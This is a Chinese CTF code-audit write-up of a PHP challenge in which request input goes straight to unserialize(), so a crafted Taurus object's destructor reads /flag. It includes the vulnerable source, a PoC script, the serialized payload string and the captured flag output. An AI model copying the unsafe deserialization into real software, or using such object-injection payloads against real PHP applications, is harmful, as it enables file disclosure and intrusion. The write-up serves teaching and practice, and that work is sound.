serVuln2 代码审计

源码

<?php

class Taurus
{
    var $user;
    var $pass;
    var $email;

    public function __construct($user, $pass, $email)
    {
        $this->user = $user;
        $this->pass = $pass;
        $this->email = $email;
    }

    function __destruct()
    {
        printf("%s\n", __METHOD__);
        $this->register();
    }

    function register()
    {
        printf("%s\n", __METHOD__);
        if ($this->user === "lutalica" && $this->pass === "P@ssw0rd" && $this->email === '231452327@ti.me') {
            echo file_get_contents('/flag');
        }
    }

}

if (isset($_REQUEST['Taurus'])) {
    unserialize($_REQUEST['Taurus']);
} else echo "系统检测发现该处漏洞，进行攻击测试\n";       

POC

<?php

class Taurus
{
    var $user;
    var $pass;
    var $email;

    public function __construct($user, $pass, $email)
    {
        $this->user = $user;
        $this->pass = $pass;
        $this->email = $email;
    }
}

echo serialize(new Taurus("lutalica", "P@ssw0rd", "231452327@ti.me"));

O:6:"Taurus":3:{s:4:"user";s:8:"lutalica";s:4:"pass";s:8:"P@ssw0rd";s:5:"email";s:15:"231452327@ti.me";}

传入payload ，得到

Taurus::__destruct
Taurus::register
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}

payload 被反序列化，触发Taurus 类的 destruct 方法，进而执行register() 方法，最终得以执行file_get_contents('/flag') 得到文件/flag 的内容